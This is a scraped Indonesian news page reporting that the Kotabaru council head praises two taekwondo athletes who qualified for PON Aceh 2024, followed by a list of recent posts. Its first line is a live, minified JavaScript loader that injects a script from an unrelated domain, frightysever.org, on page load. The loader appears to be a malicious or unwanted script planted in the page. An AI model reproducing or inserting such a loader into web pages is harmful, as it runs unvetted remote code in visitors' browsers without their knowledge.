(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
DPRD KOTABARU

Jelang PON Aceh, Ketua DPRD Kotabaru Minta Atlet Taekwondo Terus Tingkatkan Prestasi


KANALKALIMANTAN.COM, KOTABARU – Lolosnya dua atlet taekwondo ke ajang PON Aceh, Sumatera Utara tahun 2024 setelah mengikuti seleksi Pra PON di GOR POPKI Cibubur Jakarta Timur, 26 – 31 Oktober 2023, mendapat apresiasi dari ketua DPRD Kabupaten Kotabaru.

Ketiga atlet Tekwondo dari Kotabaru, yaitu Marliana (19) siswi SMK Negeri 1 Kotabaru, Nazwa Kayla Ridho Intani (17) siswi SMK Negeri 1 Kotabaru, dan Rika Putri Aulia (20), mahasiswi STKIP Paris Barantai Kotabaru, yang juga merupakan alumni SMK Negeri 1 Kotabaru, telah lolos dalam seleksi Pra PON.

Akan tetapi, hanya dua orang Lolos ke PON Aceh 2024, yakni Marliana dan Rika Putri Aulia, mereka berlaga di kategori kyorugi putri, untuk Marliana turun dikelas 57 kg sedangkan Rika Putri Aulia turun dikelas 67 kg.

Ketua DPRD Kabupaten Kotabaru, Syairi Mukhlis mengaku sangat memberikan apresiasi dan mengucapkan selamat kepada atlet Taekwondo mereka yang berhasil lolos seleksi Pra PON dan akan mewakili Provinsi Kalsel di PON nantinya.

“Ini suatu kebanggan bagi daerah kita, dan juga persatuan taekwondo yang ada di kabupaten Kotabaru, kemudian Koni Kabupaten Kotabaru,” katanya, Rabu (1/11/2023).

Ditambahkannya, prestasi yang diraih tidak lepas dari dedikasi pelatih dan dukungan yang kuat dari Koni Kabupaten Kotabaru.

Selain itu, pentingnya juga pembinaan berkelanjutan terhadap atlet-atlet berprestasi.

“Keberhasilan dari atlet Taekwondo kita akan berdamdak kepada cabor-cabor lain sehingga bisa dapat bertanya dilevel Nasional maupun internasional.

Disamping itu, dukungan moral dan finansial dari pemerintah juga sangat penting dalam mendukung pembinaan atlet-atlet berprestasi, baik dalam cabang Taekwondo maupun cabang olahraga lainnya,” imbuh dia.

Syairi berharap, agar prestasi tersebtu akan terus ditingkatkan dan program pembinaan yang terstruktur akan membantu mencapai tujuan prestasi yang lebih tinggi di masa depan.

“Mudah-mudahan kedepan pembinaan terhadap atlet-atlet kita akan terus ditingkatkan sehingga akan berdampak baik bagi prestasi atlit,” pungkas dia. (kanalkalimantan.com/muhammad)

Reporter : muhammad
Editor : Dhani


Muhammad Andi

Recent Posts

Dilakban di Paha, Empat Orang di Bandara Juwata Tarakan Selundupkan 4 Kg Sabu

KANALKALIMANTAN.COM, TARAKAN - Empat orang calon penumpang pesawat dengan rute Tarakan-Makassar batal berangkat lantaran kedapatan… Read More

12 jam ago

Satgas TMMD Bikin Sumur Bor untuk Warga Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Pengerjaan sumur bor menjadi salah satu sasaran fisik program TNI Manunggal Membangun… Read More

14 jam ago

Jemaah Termuda Kloter 1 Daftar Haji saat Umur 10 Tahun, Setor 2014 Berangkat 2024

KANALKALIMANTAN.COM, BANJARBARU - Berangkat haji ke Baitullah menunaikan Rukun Islam kelima sepenuhnya adalah panggilan. Berusia… Read More

17 jam ago

Embarkasi Banjarmasin Berangkatkan 5.759 JCH Kalsel-Kalteng, Pelayanan Penuh Jemaah Lansia

KANALKALIMANTAN.COM, BANJARBARU - Sebanyak 4.071 jemaah calon haji (JCH) asal Kalimantan Selatan (Kalsel) akan berangkat… Read More

18 jam ago

Caleg Terpilih Tak Harus Mundur Jika Maju Pilkada, Begini Penjelasan Ketua KPU Kalsel

KANALKALIMANTAN.COM, BANJARMASIN - Caleg Anggota Dewan Perwakilan Rakyat (DPR), Anggota Dewan Perwakilan Rakyat Daerah (DPRD)… Read More

19 jam ago

Lepas Keberangkatan 320 Calon Haji, Ini Pesan Bupati Banjar

KANALKALIMANTAN.COM, MARTAPURA - Bagian dalam dan luar halaman Mahligai Sultan Adam di Jalan A Yani… Read More

21 jam ago

This website uses cookies.